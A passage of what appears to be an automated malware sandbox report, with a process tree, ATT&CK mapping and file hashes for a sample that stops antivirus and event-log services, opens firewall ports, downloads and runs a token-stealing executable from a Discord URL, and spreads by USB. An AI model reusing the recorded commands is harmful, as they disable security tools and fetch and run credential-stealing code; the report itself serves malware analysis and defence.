2⤵
- Suspicious use of WriteProcessMemory
PID:832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y
3⤵
PID:1180

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto-Protect Service" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y
3⤵
PID:1584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop spoolnt
3⤵
PID:1584

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:1900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:1964

C:\Windows\system32\net.exe
net stop "McAfee Spamkiller Server" /y
2⤵
PID:1896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y
3⤵
PID:1952

C:\Windows\system32\net.exe
net stop "McAfee Personal Firewall Service" /y
2⤵
PID:1336

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y
3⤵
PID:876

C:\Windows\system32\net.exe
net stop "McAfee SecurityCenter Update Manager" /y
2⤵
PID:1036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y
3⤵
PID:560

C:\Windows\system32\net.exe
net stop "Symantec SPBBCSvc" /y
2⤵
PID:240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y
3⤵
PID:1316

C:\Windows\system32\net.exe
net stop "Ahnlab Task Scheduler" /y
2⤵
PID:780

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y
3⤵
PID:480

C:\Windows\system32\net.exe
net stop navapsvc /y
2⤵
PID:1892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop navapsvc /y
3⤵
PID:956

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:2024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:1636

C:\Windows\system32\net.exe
net stop vrmonsvc /y
2⤵
PID:1720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vrmonsvc /y
3⤵
PID:1108

C:\Windows\system32\net.exe
net stop MonSvcNT /y
2⤵
PID:1924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MonSvcNT /y
3⤵
PID:2012

C:\Windows\system32\net.exe
net stop SAVScan /y
2⤵
PID:1076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVScan /y
3⤵
PID:1752

C:\Windows\system32\net.exe
net stop NProtectService /y
2⤵
PID:1228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NProtectService /y
3⤵
PID:2028

C:\Windows\system32\net.exe
net stop ccSetMGR /y
2⤵
PID:912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMGR /y
3⤵
PID:1672

C:\Windows\system32\net.exe
net stop ccEvtMGR /y
2⤵
PID:1996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMGR /y
3⤵
PID:580

C:\Windows\system32\net.exe
net stop srservice /y
2⤵
PID:2036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop srservice /y
3⤵
PID:300

C:\Windows\system32\net.exe
net stop "Symantec Network Drivers Service" /y
2⤵
PID:280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y
3⤵
PID:1812

C:\Windows\system32\net.exe
net stop "norton Unerase Protection" /y
2⤵
PID:1552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton Unerase Protection" /y
3⤵
PID:612

C:\Windows\system32\net.exe
net stop MskService /y
2⤵
PID:628

C:\Windows\system32\net.exe
net stop MpfService /y
2⤵
PID:1488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MpfService /y
3⤵
PID:1548

C:\Windows\system32\net.exe
net stop mcupdmgr.exe /y
2⤵
PID:1824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mcupdmgr.exe /y
3⤵
PID:588

C:\Windows\system32\net.exe
net stop "McAfeeAntiSpyware" /y
2⤵
PID:1728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y
3⤵
PID:1928

C:\Windows\system32\net.exe
net stop helpsvc /y
2⤵
PID:1748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop helpsvc /y
3⤵
PID:792

C:\Windows\system32\net.exe
net stop ERSvc /y
2⤵
PID:1884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ERSvc /y
3⤵
PID:1676

C:\Windows\system32\net.exe
net stop "*norton*" /y
2⤵
PID:1312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*norton*" /y
3⤵
PID:768

C:\Windows\system32\net.exe
net stop "*Symantec*" /y
2⤵
PID:1496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*Symantec*" /y
3⤵
PID:1420

C:\Windows\system32\net.exe
net stop "*McAfee*" /y
2⤵
PID:1504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*McAfee*" /y
3⤵
PID:1916

C:\Windows\system32\net.exe
net stop ccPwdSvc /y
2⤵
PID:1324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccPwdSvc /y
3⤵
PID:1900

C:\Windows\system32\net.exe
net stop "Symantec Core LC" /y
2⤵
PID:1188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Core LC" /y
3⤵
PID:1912

C:\Windows\system32\net.exe
net stop navapsvc /y
2⤵
PID:1972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop navapsvc /y
3⤵
PID:1012

C:\Windows\system32\net.exe
net stop "Serv-U" /y
2⤵
PID:876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Serv-U" /y
3⤵
PID:1336

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:916

C:\Windows\system32\net.exe
net stop "norton AntiVirus Client" /y
2⤵
PID:1036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
3⤵
PID:1708

C:\Windows\system32\net.exe
net stop "Symantec AntiVirus Client" /y
2⤵
PID:1316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y
3⤵
PID:240

C:\Windows\system32\net.exe
net stop "norton AntiVirus Server" /y
2⤵
PID:972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Server" /y
3⤵
PID:1832

C:\Windows\system32\net.exe
net stop "NAV Alert" /y
2⤵
PID:908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NAV Alert" /y
3⤵
PID:960

C:\Windows\system32\net.exe
net stop "Nav Auto-Protect" /y
2⤵
PID:1528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Nav Auto-Protect" /y
3⤵
PID:1376

C:\Windows\system32\net.exe
net stop "McShield" /y
2⤵
PID:1636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McShield" /y
3⤵
PID:2024

C:\Windows\system32\net.exe
net stop "DefWatch" /y
2⤵
PID:1684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "DefWatch" /y
3⤵
PID:2044

C:\Windows\system32\net.exe
net stop eventlog /y
2⤵
PID:1628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop eventlog /y
3⤵
PID:1736

C:\Windows\system32\net.exe
net stop InoRPC /y
2⤵
PID:1244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoRPC /y
3⤵
PID:1096

C:\Windows\system32\net.exe
net stop InoRT /y
2⤵
PID:1176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoRT /y
3⤵
PID:1752

C:\Windows\system32\net.exe
net stop InoTask /y
2⤵
PID:1076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoTask /y
3⤵
PID:852

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:1760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:1268

C:\Windows\system32\net.exe
net stop "norton AntiVirus Client" /y
2⤵
PID:2004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
3⤵
PID:1672

C:\Windows\system32\net.exe
net stop "norton AntiVirus Corporate Edition" /y
2⤵
PID:912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y
3⤵
PID:1956

C:\Windows\system32\net.exe
net stop "ViRobot Professional Monitoring" /y
2⤵
PID:580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y
3⤵
PID:1996

C:\Windows\system32\net.exe
net stop "PC-cillin Personal Firewall" /y
2⤵
PID:1780

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y
3⤵
PID:300

C:\Windows\system32\net.exe
net stop "Trend Micro Proxy Service" /y
2⤵
PID:2036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y
3⤵
PID:1876

C:\Windows\system32\net.exe
net stop "Trend NT Realtime Service" /y
2⤵
PID:1812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y
3⤵
PID:280

C:\Windows\system32\net.exe
net stop "McAfee.com McShield" /y
2⤵
PID:1536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee.com McShield" /y
3⤵
PID:612

C:\Windows\system32\net.exe
net stop "McAfee.com VirusScan Online Realtime Engine" /y
2⤵
PID:1552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y
3⤵
PID:1880

C:\Windows\system32\net.exe
net stop "SyGateService" /y
2⤵
PID:1404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SyGateService" /y
3⤵
PID:628

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:1308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:1152

C:\Windows\system32\net.exe
net stop "Sophos Anti-Virus" /y
2⤵
PID:568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y
3⤵
PID:840

C:\Windows\system32\net.exe
net stop "Sophos Anti-Virus Network" /y
2⤵
PID:588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y
3⤵
PID:1824

C:\Windows\system32\net.exe
net stop "eTrust Antivirus Job Server" /y
2⤵
PID:1944

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y
3⤵
PID:1928

C:\Windows\system32\net.exe
net stop "eTrust Antivirus Realtime Server" /y
2⤵
PID:1728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y
3⤵
PID:676

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:1680

C:\Windows\system32\net.exe
net stop "eTrust Antivirus RPC Server" /y
2⤵
PID:1180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y
3⤵
PID:844

C:\Windows\system32\net.exe
net stop netsvcs
2⤵
PID:1068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop netsvcs
3⤵
PID:832

C:\Windows\system32\net.exe
net stop spoolnt
2⤵
PID:1064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K 2b2crypt.cmd
2⤵
PID:1964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd
2⤵
PID:1904

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
2⤵
PID:1972

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
2⤵
PID:936

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
2⤵
PID:1832

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
2⤵
PID:964

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
2⤵
PID:1684

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
2⤵
PID:1124

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
2⤵
PID:300

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
2⤵
PID:268

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
2⤵
PID:1552

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
2⤵
PID:576

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
2⤵
PID:1928

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
2⤵
PID:792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K attk1usb.cmd
2⤵
PID:1496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K attk2usb.cmd
2⤵
PID:1420

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\loveletter.vbs"
2⤵
PID:1708

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\mail.vbs"
2⤵
PID:1228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe', 'GetToken.exe')"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K spreadusb.cmd
2⤵
PID:1684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K spreadusb.cmd
2⤵
PID:1176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\Documents\apps.txt"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324

C:\Users\Admin\Documents\GetToken.exe
GetToken.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Webrequest https://ipv4.wtfismyip.com/text"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "Get-ComputerInfo"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Get-ComputerInfo"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\system32\tasklist.exe
tasklist
2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MskService /y
1⤵
PID:1404

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
- Accesses Microsoft Outlook profiles
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- outlook_win_path
PID:1488

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
27b0f8bc25c423a48d7984322ff3404d

SHA1
94673f66f91087d84cfa240668df0a2d60c8fa75

SHA256
d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26

SHA512
83d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
27b0f8bc25c423a48d7984322ff3404d

SHA1
94673f66f91087d84cfa240668df0a2d60c8fa75

SHA256
d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26

SHA512
83d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
27b0f8bc25c423a48d7984322ff3404d

SHA1
94673f66f91087d84cfa240668df0a2d60c8fa75

SHA256
d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26

SHA512
83d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
27b0f8bc25c423a48d7984322ff3404d

SHA1
94673f66f91087d84cfa240668df0a2d60c8fa75

SHA256
d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26

SHA512
83d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
27b0f8bc25c423a48d7984322ff3404d

SHA1
94673f66f91087d84cfa240668df0a2d60c8fa75

SHA256
d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26

SHA512
83d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
27b0f8bc25c423a48d7984322ff3404d

SHA1
94673f66f91087d84cfa240668df0a2d60c8fa75

SHA256
d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26

SHA512
83d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
27b0f8bc25c423a48d7984322ff3404d

SHA1
94673f66f91087d84cfa240668df0a2d60c8fa75

SHA256
d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26

SHA512
83d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912

Download Submit
C:\Users\Admin\Desktop\YcynNote.txt
Filesize
640B

MD5
2cc58ae8bf7d3567c76eaa4255b9d6d2

SHA1
9e79c3d63fe9045377b2bc9e3b076c55b641af77

SHA256
767731cff421a20ff59d9e1677b277c069c3eeb55ab2528e5dc7101a1254f448

SHA512
696e20aaa75a767cfe81fbe46369877da2d252d9081a3959e6dd7184b1e2476da9b5fbdde197761897fc2504e955c4f294d3a1dfa12c95e843de91c91a55f983

Download Submit
C:\Users\Admin\Desktop\loveletter.vbs
Filesize
495B

MD5
900ead69492d80e48738921eca28b14f

SHA1
6b51607c54f8e734a7ea47091859c3e8dce6365c

SHA256
c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3

SHA512
8fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2

Download Submit
C:\Users\Admin\Desktop\mail.vbs
Filesize
488B

MD5
88ef4bc3f48eeb97aedadff8f3840980

SHA1
48e8167bef2562d902885a075f6190d269fd3d35

SHA256
b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa

SHA512
523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024

Download Submit
C:\Users\Admin\Desktop\spreadusb.cmd
Filesize
140B

MD5
591248610b25d51736f91c45f788cf6e

SHA1
b810cf36ed55fa0ea44c2dafb273e2463fbbda56

SHA256
cc1baa061feaf3f747f2d932f077629579f5ce7ec6018bbede7a3220a090a5d1

SHA512
0cdbe0d5e2f618f9776cc698ca40d028e4cdbc24537179afde3eee08d13921907f34cedb30726858af36f5366d767a19180665053886646a187025e253912b99

Download Submit
C:\Users\Admin\Documents\2b2crypt.cmd
Filesize
138B

MD5
8a0e18e8c3724921943bd90e6070dc8e

SHA1
13ba409f261173c093918af6c786fe6d863164cf

SHA256
ac34f2c032a70571a4d51ca8de3c7cee1ba51aadbddb0534fb358e9b312d2ca6

SHA512
54c9e4aef02fb333c9e0af9dda2b2dbfe8bc9550f127051238d800e1e927e34ce272e457db591bbd6414d1fc703d5185ca557652e508e5dd3211a013cc85e34a

Download Submit
C:\Users\Admin\Documents\2b2crypt.m.cmd
Filesize
142B

MD5
28057d0514c31373a5e6135b7b477196

SHA1
719373c153c7a245bdcd6118330e38c15432eb20

SHA256
3179106c4ec0e5fe5129399101c20d79dc9504f29a6e5fdbb0b507fa75d9a9eb

SHA512
32952350e35b4ccb6115926ea117d3f8cc49d100a2e47a652f69b5c64f7cf2de2771d9b9b46f6d17cb30162e04022d280fb2d5a54ddd3c396b728623e4692596

Download Submit
C:\Users\Admin\Documents\GetToken.exe
Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\Documents\GetToken.exe
Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\Documents\NoKeyB.exe
Filesize
1.2MB

MD5
6bc9c0340385a1ff2a8dd1b841415211

SHA1
f7b4088b012271ed06c24392bbcb5f9eb75219c2

SHA256
9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13

SHA512
9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

Download Submit
C:\Users\Admin\Documents\NoKeyB.exe
Filesize
1.2MB

MD5
6bc9c0340385a1ff2a8dd1b841415211

SHA1
f7b4088b012271ed06c24392bbcb5f9eb75219c2

SHA256
9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13

SHA512
9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

Download Submit
C:\Users\Admin\Documents\Tokens.txt
Filesize
22B

MD5
3d74b4a3f6053a5a252f4faee7fb157e

SHA1
576c1a2892dad89c3b6aba698ee67258be827eaf

SHA256
445f09c32e44ec144320d929de814ceda449da7efa062a19c1cc78cde29fb139

SHA512
dab16b5c564af14fb632f086b99530061d86f54cffed6bfa1b9ae59f97b77beec8ae89c132e2a217d555df512c75bb236921014ac0ff8053c88af16a96db7529

Download Submit
C:\Users\Admin\Documents\apps.txt
Filesize
8KB

MD5
54d233cc9e2bbf4034df3da6e9c593e0

SHA1
3a8e977d9e481d6ffeb3d8a38a3509d9a4da68cc

SHA256
de92216e0d295e216904fdb5aadfd4a979da395000ff7bf70f31c2c8df42096f

SHA512
fc85b2a109effe64c76576f750711a992fac3d98db690bef596a43baf5fc318143d49a109f8a5afe68f2b1bf9c4521987ad612b062eb8744bfee7922ee02750d

Download Submit
C:\Windows\win.ini
Filesize
640B

MD5
37a42188327ced5450bd8ef9b5a16bbe

SHA1
1f332e4ea66e55337808fb794b58ea4e182e1f19

SHA256
4fb7375c44fab40f69801d65177027c52cdbb79fdcfb3a91d75c469f7fe0533d

SHA512
3d0751688dc9026da234f1c61330782fbc20655ff8a810c2bf529db958e1d3fd3b9bce7d9e027edbe92c819b9074474e5e84775828a11721e9aeb05d85a0f363

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\Documents\NoKeyB.exe
Filesize
1.2MB

MD5
6bc9c0340385a1ff2a8dd1b841415211

SHA1
f7b4088b012271ed06c24392bbcb5f9eb75219c2

SHA256
9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13

SHA512
9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

Download Submit
memory/240-96-0x0000000000000000-mapping.dmp

Download
memory/280-118-0x0000000000000000-mapping.dmp

Download
memory/300-117-0x0000000000000000-mapping.dmp

Download
memory/480-99-0x0000000000000000-mapping.dmp

Download
memory/560-95-0x0000000000000000-mapping.dmp

Download
memory/576-78-0x0000000000000000-mapping.dmp

Download
